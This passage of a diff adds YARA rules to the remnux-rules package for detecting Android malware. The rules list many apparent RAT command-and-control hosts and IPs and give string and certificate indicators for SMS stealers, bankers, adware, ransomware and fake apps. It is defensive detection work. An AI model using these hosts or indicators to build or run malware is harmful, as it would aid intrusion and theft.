+		androguard.url(/109\.122\.41\.237/) or 
+		androguard.url(/droidjack\.hopto\.org/) or 
+		androguard.url(/randsnaira\.dnsdynamic\.com/) or 
+		androguard.url(/egytiger\.myftp\.org/) or 
+		androguard.url(/hehe\.duckdns\.org/) or 
+		androguard.url(/seven1\.ddns\.net/) or 
+		androguard.url(/younix\.ddns\.net/) or 
+		androguard.url(/huntergold\.no-ip\.biz/) or 
+		androguard.url(/151\.246\.230\.21/) or 
+		androguard.url(/xos1982\.ddns\.net/) or 
+		androguard.url(/85\.136\.243\.80/) or 
+		androguard.url(/yelp01\.f3322\.org/) or 
+		androguard.url(/teolandia\.no-ip\.biz/) or 
+		androguard.url(/jokerbabel\.no-ip\.biz/) or 
+		androguard.url(/cccamd\.myftp\.biz/) or 
+		androguard.url(/109\.165\.69\.25/) or 
+		androguard.url(/googles\.servemp3\.com/) or 
+		androguard.url(/vb\.blogsyte\.com/) or 
+		androguard.url(/karrarhuseein82\.ddns\.net/) or 
+		androguard.url(/applecenikosmos\.hldns\.ru/) or 
+		androguard.url(/dadadadadaprivet\.ddns\.net/) or 
+		androguard.url(/1349874791\.gnway\.cc/) or 
+		androguard.url(/bapforall\.ddns\.net/) or 
+		androguard.url(/mahamadmahmod\.ddns\.net/) or 
+		androguard.url(/nademhack\.no-ip\.org/) or 
+		androguard.url(/42\.236\.159\.93/) or 
+		androguard.url(/myaw\.no-ip\.biz/) or 
+		androguard.url(/msn-web\.ddnsking\.com/) or 
+		androguard.url(/draagon\.ddns\.net/) or 
+		androguard.url(/winlogen\.duckdns\.org/) or 
+		androguard.url(/albash2222\.ddns\.net/) or 
+		androguard.url(/82\.223\.31\.121/) or 
+		androguard.url(/ahmed2012\.dynu\.com/) or 
+		androguard.url(/188\.3\.13\.98/) or 
+		androguard.url(/hardik\.no-ip\.info/) or 
+		androguard.url(/asdqqq\.bounceme\.net/) or 
+		androguard.url(/test\.no-ip\.org/) or 
+		androguard.url(/housam\.linkpc\.net/) or 
+		androguard.url(/evilcasper\.ddns\.net/) or 
+		androguard.url(/kilasx\.ddns\.net/) or 
+		androguard.url(/pars\.ddns\.net/) or 
+		androguard.url(/noiphackk\.ddns\.net/) or 
+		androguard.url(/hack1111\.noip\.me/) or 
+		androguard.url(/hackhack2016\.no-ip\.info/) or 
+		androguard.url(/haxor\.hopto\.org/) or 
+		androguard.url(/zokor-zokor\.ddns\.net/) or 
+		androguard.url(/xzoro2016\.no-ip\.info/) or 
+		androguard.url(/81\.177\.33\.218/) or 
+		androguard.url(/momo2015\.duckdns\.org/) or 
+		androguard.url(/pimpdaddy\.myq-see\.com/) or 
+		androguard.url(/scropion20078\.no-ip\.biz/) or 
+		androguard.url(/106\.51\.163\.232/) or 
+		androguard.url(/fuckyou\.duckdns\.org/) or 
+		androguard.url(/zakifr\.no-ip\.biz/) or 
+		androguard.url(/microsoft-office\.ddns\.net/) or 
+		androguard.url(/2\.25\.171\.244/) or 
+		androguard.url(/85\.202\.29\.79/) or 
+		androguard.url(/mariorossi2013\.homepc\.it/) or 
+		androguard.url(/hackcam\.zapto\.org/) or 
+		androguard.url(/mokhter222029\.ddns\.net/) or 
+		androguard.url(/win32\.ddns\.net/) or 
+		androguard.url(/ggwasgeht\.ddns\.net/) or 
+		androguard.url(/dexonic\.duckdns\.org/) or 
+		androguard.url(/coxiamigo\.myq-see\.com/) or 
+		androguard.url(/hamidoranis\.no-ip\.biz/) or 
+		androguard.url(/ospr\.publicvm\.com/) or 
+		androguard.url(/karasqlee9\.no-ip\.org/) or 
+		androguard.url(/hax\.no-ip\.info/) or 
+		androguard.url(/haa7aah\.no-ip\.biz/) or 
+		androguard.url(/omar\.no-ip\.biz/) or 
+		androguard.url(/yuosaf1993\.ddns\.net/) or 
+		androguard.url(/88\.164\.37\.97/) or 
+		androguard.url(/88\.247\.226\.120/) or 
+		androguard.url(/indusv00\.duckdns\.org/) or 
+		androguard.url(/andver18\.no-ip\.biz/) or 
+		androguard.url(/unknownuser\.no-ip\.biz/) or 
+		androguard.url(/nassahsliman\.ddns\.net/) or 
+		androguard.url(/gcafegood\.noip\.me/) or 
+		androguard.url(/rockrock\.ddns\.net/) or 
+		androguard.url(/188\.24\.119\.27/) or 
+		androguard.url(/93\.157\.235\.248/) or 
+		androguard.url(/komplevit-rat\.ddns\.net/) or 
+		androguard.url(/pianotiles2\.ddns\.net/) or 
+		androguard.url(/tobytori18\.myftp\.org/) or 
+		androguard.url(/105\.106\.49\.154/) or 
+		androguard.url(/moonmar10\.no-ip\.biz/) or 
+		androguard.url(/100009755836320\.no-ip\.biz/) or 
+		androguard.url(/villevalo\.chickenkiller\.com/) or 
+		androguard.url(/samoomalik\.no-ip\.biz/) or 
+		androguard.url(/foxfeline\.no-ip\.org/) or 
+		androguard.url(/kskdt\.ddns\.net/) or 
+		androguard.url(/fati43030\.no-ip\.biz/) or 
+		androguard.url(/shop10\.ddns\.net/) or 
+		androguard.url(/fairylow\.no-ip\.biz/) or 
+		androguard.url(/a\.tomx\.xyz/) or 
+		androguard.url(/r90\.no-ip\.biz/) or 
+		androguard.url(/46\.45\.207\.81/) or 
+		androguard.url(/warrirrs\.no-ip\.org/) or 
+		androguard.url(/azert123\.ddns\.net/) or 
+		androguard.url(/soso\.noip\.us/) or 
+		androguard.url(/sniperyakub\.ddns\.net/) or 
+		androguard.url(/baby\.webhop\.me/) or 
+		androguard.url(/zero228\.ddns\.net/) or 
+		androguard.url(/reddemon\.ddns\.net/) or 
+		androguard.url(/viagra\.jumpingcrab\.com/) or 
+		androguard.url(/domira\.ddns\.net/) or 
+		androguard.url(/alkingahmed555\.ddns\.net/) or 
+		androguard.url(/mahdi3141\.ddns\.net/) or 
+		androguard.url(/somenormalguy\.duckdns\.org/) or 
+		androguard.url(/shoo2018\.no-ip\.org/) or 
+		androguard.url(/goldeneagle1112\.ddns\.net/) or 
+		androguard.url(/hardstyleraver\.no-ip\.org/) or 
+		androguard.url(/79\.141\.163\.20/) or 
+		androguard.url(/mezoo32\.no-ip\.biz/) or 
+		androguard.url(/islam2020libya\.no-ip\.biz/) or 
+		androguard.url(/kingdom\.no-ip\.biz/) or 
+		androguard.url(/x300x300xx\.no-ip\.org/) or 
+		androguard.url(/puplicdsl\.ddns\.net/) or 
+		androguard.url(/teda11\.zapto\.org/) or 
+		androguard.url(/testsss\.ddns\.net/) or 
+		androguard.url(/185\.32\.221\.23/) or 
+		androguard.url(/topmax\.myq-see\.com/) or 
+		androguard.url(/sarasisi\.no-ip\.org/) or 
+		androguard.url(/dodee97dodee\.ddns\.net/) or 
+		androguard.url(/kararkarar0780\.ddns\.net/) or 
+		androguard.url(/darweshfis\.no-ip\.org/) or 
+		androguard.url(/jastn\.ddns\.net/) or 
+		androguard.url(/flashplayerxx\.no-ip\.org/) or 
+		androguard.url(/thaer\.no-ip\.biz/) or 
+		androguard.url(/elisou19\.ddns\.net/) or 
+		androguard.url(/dkms\.ddns\.net/) or 
+		androguard.url(/aaaa\.com/) or 
+		androguard.url(/liquidixen\.ddns\.net/) or 
+		androguard.url(/moep004\.no-ip\.org/) or 
+		androguard.url(/aaaaaaaaaabbbbb\.hopto\.org/) or 
+		androguard.url(/rok13198666\.no-ip\.biz/) or 
+		androguard.url(/1337ace\.ddns\.net/) or 
+		androguard.url(/droidjack33\.no-ip\.biz/) or 
+		androguard.url(/abdouoahmed\.ddns\.net/) or 
+		androguard.url(/bambi\.no-ip\.biz/) or 
+		androguard.url(/e777kx47\.ddns\.net/) or 
+		androguard.url(/shanks\.no-ip\.biz/) or 
+		androguard.url(/black1990\.ddns\.net/) or 
+		androguard.url(/brave-hacker\.no-ip\.org/) or 
+		androguard.url(/ala6a\.no-ip\.biz/) or 
+		androguard.url(/sarahwygan\.no-ip\.biz/) or 
+		androguard.url(/khantac\.ddns\.net/) or 
+		androguard.url(/107\.151\.193\.126/) or 
+		androguard.url(/madov-matrix25\.no-ip\.org/) or 
+		androguard.url(/93\.185\.151\.217/) or 
+		androguard.url(/203\.189\.232\.237/) or 
+		androguard.url(/zxczxczxc\.ddns\.net/) or 
+		androguard.url(/07726657423zaion\.no-ip\.biz/) or 
+		androguard.url(/amran-pc\.no-ip\.biz/) or 
+		androguard.url(/myfrenid2x\.zapto\.org/) or 
+		androguard.url(/winserver\.dlinkddns\.com/) or 
+		androguard.url(/mzgerges\.no-ip\.biz/) or 
+		androguard.url(/cjbks0u0\.no-ip\.org/) or 
+		androguard.url(/silenthunter3021\.no-ip\.org/) or 
+		androguard.url(/engrid\.no-ip\.biz/) or 
+		androguard.url(/137\.0\.0\.1/) or 
+		androguard.url(/snopi\.no-ip\.biz/) or 
+		androguard.url(/hhamokcha\.ddns\.net/) or 
+		androguard.url(/clashdroid\.no-ip\.biz/) or 
+		androguard.url(/jkgytgasjg12\.serveftp\.com/) or 
+		androguard.url(/owsen\.ddns\.net/) or 
+		androguard.url(/thegangsterrap\.noip\.me/) or 
+		androguard.url(/81\.4\.104\.129/) or 
+		androguard.url(/droid\.deutsche-db-bank\.ru/) or 
+		androguard.url(/gold5000\.ddns\.net/) or 
+		androguard.url(/hassanabd1233\.ddns\.net/) or 
+		androguard.url(/love2014\.ddns\.net/) or 
+		androguard.url(/bassamzeyad\.ddns\.net/) or 
+		androguard.url(/denishul\.hldns\.ru/) or 
+		androguard.url(/hacker-81\.no-ip\.biz/) or 
+		androguard.url(/noipjajaja\.ddns\.net/) or 
+		androguard.url(/41\.38\.56\.81/) or 
+		androguard.url(/tataline\.hopto\.org/) or 
+		androguard.url(/abedjaradat1177\.no-ip\.org/) or 
+		androguard.url(/voda\.no-ip\.org/) or 
+		androguard.url(/mohamednjrat111\.no-ip\.biz/) or 
+		androguard.url(/hakeerali2\.ddns\.net/) or 
+		androguard.url(/5\.189\.137\.186/) or 
+		androguard.url(/79\.137\.223\.139/) or 
+		androguard.url(/makarand\.no-ip\.org/) or 
+		androguard.url(/mehost\.ddns\.net/) or 
+		androguard.url(/xmohcine\.ddns\.net/) or 
+		androguard.url(/alabama192837\.no-ip\.org/)
+}
+
+rule ibanking: amtrckr
+{
+	meta:
+		family = "ibanking"
+
+	condition:
+		androguard.url(/www\.irmihan\.ir/) or 
+		androguard.url(/emberaer\.com/)
+}
diff -Nru remnux-rules-0.0.3/yara/Mobile_Malware/Android_adware.yar remnux-rules-0.0.4/yara/Mobile_Malware/Android_adware.yar
--- remnux-rules-0.0.3/yara/Mobile_Malware/Android_adware.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/Mobile_Malware/Android_adware.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,22 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+*/
+
+rule adware : ads android
+{
+	meta:
+		author = "Fernando Denis Ramirez https://twitter.com/fdrg21"
+		reference = "https://koodous.com/"
+		description = "Adware"
+		sample = "5a331231f997decca388ba2d73b7dec1554e966a0795b0cb8447a336bdafd71b"
+
+	strings:
+		$string_a = "banner_layout"
+		$string_b = "activity_adpath_sms"
+		$string_c = "adpath_title_one"
+		$string_d = "7291-2ec9362bd699d0cd6f53a5ca6cd"
+
+	condition:
+		all of ($string_*)
+		
+}
diff -Nru remnux-rules-0.0.3/yara/Mobile_Malware/Android_AliPay_smsStealer.yar remnux-rules-0.0.4/yara/Mobile_Malware/Android_AliPay_smsStealer.yar
--- remnux-rules-0.0.3/yara/Mobile_Malware/Android_AliPay_smsStealer.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/Mobile_Malware/Android_AliPay_smsStealer.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,34 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+*/
+
+/*
+	Androguard module used in this rule file is under development by people at https://koodous.com/.
+
+	You can get it, along with installation instructions, at https://github.com/Koodous/androguard-yara
+*/
+
+import "androguard"
+
+rule Android_AliPay_smsStealer : android
+{
+	meta:
+		description = "Yara rule for detection of Fake AliPay Sms Stealer"
+		sample = "f4794dd02d35d4ea95c51d23ba182675cc3528f42f4fa9f50e2d245c08ecf06b"
+		source = "http://research.zscaler.com/2016/02/fake-security-app-for-alipay-customers.html"
+		ref = "https://analyst.koodous.com/rulesets/1192"
+		author = "https://twitter.com/5h1vang"
+
+	strings:
+		$str_1 = "START_SERVICE"
+		$str_2 = "extra_key_sms"
+		$str_3 = "android.provider.Telephony.SMS_RECEIVED"
+		$str_4 = "mPhoneNumber"
+
+	condition:
+		androguard.certificate.sha1("0CDFC700D0BDDC3EA50D71B54594BF3711D0F5B2") or
+		androguard.permission(/android.permission.RECEIVE_SMS/) and
+		androguard.permission(/android.permission.INTERNET/) and
+		androguard.permission(/android.permission.RECEIVE_BOOT_COMPLETED/) and 		
+		all of ($str_*)
+}
diff -Nru remnux-rules-0.0.3/yara/Mobile_Malware/Android_ASSDdeveloper.yar remnux-rules-0.0.4/yara/Mobile_Malware/Android_ASSDdeveloper.yar
--- remnux-rules-0.0.3/yara/Mobile_Malware/Android_ASSDdeveloper.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/Mobile_Malware/Android_ASSDdeveloper.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,24 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+*/
+
+/*
+	Androguard module used in this rule file is under development by people at https://koodous.com/.
+
+	You can get it, along with installation instructions, at https://github.com/Koodous/androguard-yara
+*/
+
+import "androguard"
+
+rule assd_developer : official android
+{
+	meta:
+		author = "Fernando Denis Ramirez https://twitter.com/fdrg21"
+		reference = "https://koodous.com/"
+		description = "This rule detects apks fom ASSD developer"
+		sample = "cb9721c524f155478e9402d213e240b9f99eaba86fcbce0571cd7da4e258a79e"
+
+	condition:
+		androguard.certificate.sha1("ED9A1CE1F18A1097DCCC5C0CB005E3861DA9C34A")
+		
+}
diff -Nru remnux-rules-0.0.3/yara/Mobile_Malware/Android_BatteryBot_ClickFraud.yar remnux-rules-0.0.4/yara/Mobile_Malware/Android_BatteryBot_ClickFraud.yar
--- remnux-rules-0.0.3/yara/Mobile_Malware/Android_BatteryBot_ClickFraud.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/Mobile_Malware/Android_BatteryBot_ClickFraud.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,25 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+*/
+
+/*
+	Androguard module used in this rule file is under development by people at https://koodous.com/.
+
+	You can get it, along with installation instructions, at https://github.com/Koodous/androguard-yara
+*/
+
+import "androguard"
+
+rule batterybotpro : ClickFraud AdFraud SMS Downloader_Trojan android
+{
+	meta:
+		description = "http://research.zscaler.com/2015/07/fake-batterybotpro-clickfraud-adfruad.html"
+		sample = "cc4e024db858d7fa9b03d7422e760996de6a4674161efbba22d05f8b826e69d5"
+		author = "https://twitter.com/fdrg21"
+
+	condition:
+
+		androguard.activity(/com\.polaris\.BatteryIndicatorPro\.BatteryInfoActivity/i) and
+		androguard.permission(/android\.permission\.SEND_SMS/)
+		
+}
diff -Nru remnux-rules-0.0.3/yara/Mobile_Malware/Android_Dectus_rswm.yar remnux-rules-0.0.4/yara/Mobile_Malware/Android_Dectus_rswm.yar
--- remnux-rules-0.0.3/yara/Mobile_Malware/Android_Dectus_rswm.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/Mobile_Malware/Android_Dectus_rswm.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,42 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+*/
+
+/*
+	Androguard module used in this rule file is under development by people at https://koodous.com/.
+
+	You can get it, along with installation instructions, at https://github.com/Koodous/androguard-yara
+*/
+
+import "androguard"
+
+rule Android_Dogspectus_rswm
+{
+	meta:
+		author = "https://twitter.com/5h1vang"
+		description = "Yara rule for Dogspectus intial ransomware apk"
+		sample = "197588be3e8ba5c779696d864121aff188901720dcda796759906c17473d46fe"
+		source = "https://www.bluecoat.com/security-blog/2016-04-25/android-exploit-delivers-dogspectus-ransomware"
+
+	strings:
+		$str_1 = "android.app.action.ADD_DEVICE_ADMIN"
+		$str_2 = "Tap ACTIVATE to continue with software update"
+		
+		
+	condition:
+		(androguard.package_name("net.prospectus") and
+		 androguard.app_name("System update")) or
+		 
+		androguard.certificate.sha1("180ADFC5DE49C0D7F643BD896E9AAC4B8941E44E") or
+		
+		(androguard.activity(/Loganberry/i) or 
+		androguard.activity("net.prospectus.pu") or 
+		androguard.activity("PanickedActivity")) or 
+		
+		(androguard.permission(/android.permission.INTERNET/) and
+		 androguard.permission(/android.permission.WAKE_LOCK/) and 
+		 androguard.permission(/android.permission.RECEIVE_BOOT_COMPLETED/) and
+		 all of ($str_*))
+		 	
+		
+}
diff -Nru remnux-rules-0.0.3/yara/Mobile_Malware/Android_Drendoid_RAT.yar remnux-rules-0.0.4/yara/Mobile_Malware/Android_Drendoid_RAT.yar
--- remnux-rules-0.0.3/yara/Mobile_Malware/Android_Drendoid_RAT.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/Mobile_Malware/Android_Drendoid_RAT.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,48 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+*/
+
+rule Dendroid : android
+{
+	meta:
+	author = "https://twitter.com/jsmesa"
+	reference = "https://koodous.com/"
+	description = "Dendroid RAT"
+	strings:
+    	$s1 = "/upload-pictures.php?"
+    	$s2 = "Opened Dialog:"
+    	$s3 = "com/connect/MyService"
+    	$s4 = "android/os/Binder"
+    	$s5 = "android/app/Service"
+   	condition:
+    	all of them
+
+}
+
+rule Dendroid_2 : android
+{
+	meta:
+	author = "https://twitter.com/jsmesa"
+	reference = "https://koodous.com/"
+	description = "Dendroid evidences via Droidian service"
+	strings:
+    	$a = "Droidian"
+    	$b = "DroidianService"
+   	condition:
+    	all of them
+
+}
+
+rule Dendroid_3 : android
+{
+	meta:
+	author = "https://twitter.com/jsmesa"
+	reference = "https://koodous.com/"
+	description = "Dendroid evidences via ServiceReceiver"
+	strings:
+    	$1 = "ServiceReceiver"
+    	$2 = "Dendroid"
+   	condition:
+    	all of them
+
+}
diff -Nru remnux-rules-0.0.3/yara/Mobile_Malware/Android_FakeApps.yar remnux-rules-0.0.4/yara/Mobile_Malware/Android_FakeApps.yar
--- remnux-rules-0.0.3/yara/Mobile_Malware/Android_FakeApps.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/Mobile_Malware/Android_FakeApps.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,103 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+*/
+
+/*
+	Androguard module used in this rule file is under development by people at https://koodous.com/.
+
+	You can get it, along with installation instructions, at https://github.com/Koodous/androguard-yara
+*/
+
+import "androguard"
+
+rule fake_facebook: fake android
+{
+  meta:
+		  author = "https://twitter.com/Diviei"
+		  reference = "https://koodous.com/"
+	condition:
+		androguard.app_name("Facebook")
+		and not androguard.certificate.sha1("A0E980408030C669BCEB38FEFEC9527BE6C3DDD0")
+}
+
+
+rule fake_facebook_2 : fake android
+{
+	meta:
+		author = "https://twitter.com/plutec_net"
+		reference = "https://koodous.com/"
+		description = "Detects fake facebook applications"
+		hash_0 = "7be33c2d27121968d2f7081ae2b04965238a3c15c7aae62d006f629d64e0b58e"
+		hash_1 = "c1264c689393880361409eb02570fd49bec91c88569d39062e13c0c8ae0e1806"
+		hash_2 = "70d5cc909d5718674474a54b44f83bd194cbdd2d99354d52cd868b334fb5f3de"
+		hash_3 = "38e757abd5e015e3c3690ea0fdc2ff1e04b716651645a8c4ca6a63185856fe29"
+		hash_4 = "ba0b8fe37b4874656ad129dd4d96fdec181e2c3488985309241b0449bb4ab84f"
+		hash_5 = "7be33c2d27121968d2f7081ae2b04965238a3c15c7aae62d006f629d64e0b58e"
+		hash_6 = "c1264c689393880361409eb02570fd49bec91c88569d39062e13c0c8ae0e1806"
+		hash_7 = "7345c3124891b34607a07e93c8ab6dcbbf513e24e936c3710434b085981b815a"
+		
+	condition:
+		androguard.app_name("Facebook") and
+		not androguard.package_name(/com.facebook.katana/) and 
+		not androguard.certificate.issuer(/O=Facebook Mobile/)	
+}
+
+rule fake_instagram: fake android
+{
+  meta:
+		  author = "https://twitter.com/Diviei"
+		  reference = "https://koodous.com/"
+	condition:
+		androguard.app_name("Instagram")
+		and not androguard.certificate.sha1("76D72C35164513A4A7EBA098ACCB2B22D2229CBE")
+}
+
+rule fake_king_games: fake android
+{
+	condition:
+		(androguard.app_name("AlphaBetty Saga")
+		or androguard.app_name("Candy Crush Soda Saga")
+		or androguard.app_name("Candy Crush Saga")
+		or androguard.app_name("Farm Heroes Saga")
+		or androguard.app_name("Pet Rescue Saga")
+		or androguard.app_name("Bubble Witch 2 Saga")
+		or androguard.app_name("Scrubby Dubby Saga")
+		or androguard.app_name("Diamond Digger Saga")
+		or androguard.app_name("Papa Pear Saga")
+		or androguard.app_name("Pyramid Solitaire Saga")
+		or androguard.app_name("Bubble Witch Saga")
+		or androguard.app_name("King Challenge"))
+		and not androguard.certificate.sha1("9E93B3336C767C3ABA6FCC4DEADA9F179EE4A05B")
+}
+
+rule fake_market: fake android
+{
+  meta:
+		author = "https://twitter.com/plutec_net"
+		reference = "https://koodous.com/"
+
+	condition:
+		androguard.package_name("com.minitorrent.kimill") 
+}
+
+
+rule fake_minecraft: fake android
+{
+  meta:
+		author = "https://twitter.com/plutec_net"
+		reference = "https://koodous.com/"
+	condition:
+		( androguard.app_name("Minecraft: Pocket Edition") or 
+			androguard.app_name("Minecraft - Pocket Edition") )
+		and not androguard.package_name("com.mojang.minecraftpe")
+}
+
+rule fake_whatsapp: fake android
+{
+  meta:
+		  author = "https://twitter.com/Diviei"
+		  reference = "https://koodous.com/"
+	condition:
+		androguard.app_name("WhatsApp") and
+		not androguard.certificate.sha1("38A0F7D505FE18FEC64FBF343ECAAAF310DBD799")
+}
diff -Nru remnux-rules-0.0.3/yara/Mobile_Malware/Android_generic_adware.yar remnux-rules-0.0.4/yara/Mobile_Malware/Android_generic_adware.yar
--- remnux-rules-0.0.3/yara/Mobile_Malware/Android_generic_adware.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/Mobile_Malware/Android_generic_adware.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,20 @@
+rule dowgin:adware android
+{
+    meta:
+        author = "https://twitter.com/plutec_net"
+        reference = "https://koodous.com/"
+        sample = "4d7f2d6ff4ed8ced6f8f7f96e9899273cc3090ea108f2cc3b32dd1a06e63cf70"
+        sample2 = "cde8160d09c486bdd6d96b2ed81bd52390d77094d13ff9cfbc6949ed00206a83"
+        sample3 = "d2e81e6db5f4964246d10241588e0e97cde524815c4de7c0ea1c34a48da1bcaf"
+        sample4 = "cc2d0b3d8f00690298b0e5813f6ace8f4d4b04c9704292407c2b83a12c69617b"
+
+    strings:
+        $a = "http://112.74.111.42:8000"
+        $b = "SHA1-Digest: oIx4iYWeTtKib4fBH7hcONeHuaE="
+        $c = "ONLINEGAMEPROCEDURE_WHICH_WAP_ID"
+        $d = "http://da.mmarket.com/mmsdk/mmsdk?func=mmsdk:posteventlog"
+
+    condition:
+        all of them
+        
+}
diff -Nru remnux-rules-0.0.3/yara/Mobile_Malware/Android_generic_smsfraud.yar remnux-rules-0.0.4/yara/Mobile_Malware/Android_generic_smsfraud.yar
--- remnux-rules-0.0.3/yara/Mobile_Malware/Android_generic_smsfraud.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/Mobile_Malware/Android_generic_smsfraud.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,38 @@
+rule genericSMS : smsFraud android
+{
+	meta:
+	    	author = "https://twitter.com/plutec_net"
+            	reference = "https://koodous.com/"
+	    	sample = "3fc533d832e22dc3bc161e5190edf242f70fbc4764267ca073de5a8e3ae23272"
+	    	sample2 = "3d85bdd0faea9c985749c614a0676bb05f017f6bde3651f2b819c7ac40a02d5f"
+
+	strings:
+		$a = "SHA1-Digest: +RsrTx5SNjstrnt7pNaeQAzY4kc="
+		$b = "SHA1-Digest: Rt2oRts0wWTjffGlETGfFix1dfE="
+		$c = "http://image.baidu.com/wisebrowse/index?tag1=%E6%98%8E%E6%98%9F&tag2=%E5%A5%B3%E6%98%8E%E6%98%9F&tag3=%E5%85%A8%E9%83%A8&pn=0&rn=10&fmpage=index&pos=magic#/channel"
+		$d = "pitchfork=022D4"
+
+	condition:
+		all of them
+		
+}
+
+rule genericSMS2 : smsFraud android
+{
+	meta:
+		author = "https://twitter.com/plutec_net"
+                reference = "https://koodous.com/"
+		sample = "1f23524e32c12c56be0c9a25c69ab7dc21501169c57f8d6a95c051397263cf9f"
+		sample2 = "2cf073bd8de8aad6cc0d6ad5c98e1ba458bd0910b043a69a25aabdc2728ea2bd"
+		sample3 = "20575a3e5e97bcfbf2c3c1d905d967e91a00d69758eb15588bdafacb4c854cba"
+
+	strings:
+		$a = "NotLeftTriangleEqual=022EC"
+		$b = "SHA1-Digest: X27Zpw9c6eyXvEFuZfCL2LmumtI="
+		$c = "_ZNSt12_Vector_baseISsSaISsEE13_M_deallocateEPSsj"
+		$d = "FBTP2AHR3WKC6LEYON7D5GZXVISMJ4QU"
+
+	condition:
+		all of them
+		
+}
diff -Nru remnux-rules-0.0.3/yara/Mobile_Malware/Android_malware_Advertising.yar remnux-rules-0.0.4/yara/Mobile_Malware/Android_malware_Advertising.yar
--- remnux-rules-0.0.3/yara/Mobile_Malware/Android_malware_Advertising.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/Mobile_Malware/Android_malware_Advertising.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,22 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+*/
+
+/*
+	Androguard module used in this rule file is under development by people at https://koodous.com/.
+
+	You can get it, along with installation instructions, at https://github.com/Koodous/androguard-yara
+*/
+
+import "androguard"
+
+rule leadbolt : advertising android
+{
+	meta:
+	  author = "https://twitter.com/plutec_net"
+		reference = "https://koodous.com/"
+		description = "Leadbolt"
+		
+	condition:
+		androguard.url(/http:\/\/ad.leadbolt.net/)
+}
diff -Nru remnux-rules-0.0.3/yara/Mobile_Malware/Android_malware_banker.yar remnux-rules-0.0.4/yara/Mobile_Malware/Android_malware_banker.yar
--- remnux-rules-0.0.3/yara/Mobile_Malware/Android_malware_banker.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/Mobile_Malware/Android_malware_banker.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,42 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+*/
+
+/*
+	Androguard module used in this rule file is under development by people at https://koodous.com/.
+
+	You can get it, along with installation instructions, at https://github.com/Koodous/androguard-yara
+*/
+
+import "androguard"
+
+rule Android_Malware : iBanking android
+{
+	meta:
+		author = "Xylitol xylitol@malwareint.com"
+		date = "2014-02-14"
+		description = "Match first two bytes, files and string present in iBanking"
+		reference = "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3166"
+		
+	strings:
+		// Generic android
+		$pk = {50 4B}
+		$file1 = "AndroidManifest.xml"
+		// iBanking related
+		$file2 = "res/drawable-xxhdpi/ok_btn.jpg"
+		$string1 = "bot_id"
+		$string2 = "type_password2"
+	condition:
+		($pk at 0 and 2 of ($file*) and ($string1 or $string2))
+}
+
+rule Installer: banker android
+{
+	meta:
+		author = "https://twitter.com/plutec_net"
+		reference = "https://koodous.com/"
+		description = "Applications with Installer as an application name"
+
+	condition:
+		androguard.package_name("Jk7H.PwcD")
+}
diff -Nru remnux-rules-0.0.3/yara/Mobile_Malware/Android_MalwareCertificates.yar remnux-rules-0.0.4/yara/Mobile_Malware/Android_MalwareCertificates.yar
--- remnux-rules-0.0.3/yara/Mobile_Malware/Android_MalwareCertificates.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/Mobile_Malware/Android_MalwareCertificates.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,27 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+*/
+
+/*
+	Androguard module used in this rule file is under development by people at https://koodous.com/.
+
+	You can get it, along with installation instructions, at https://github.com/Koodous/androguard-yara
+*/
+
+import "androguard"
+
+rule fraudulents_2 : certificates android
+{
+	meta:
+		description = "This rule automatically adds certificates present in malware"
+		author = "https://twitter.com/fdrg21"
+
+	condition:
+		androguard.certificate.sha1("A5D9C9A40A3786D631210E8FCB9CF7A1BC5B3062") or
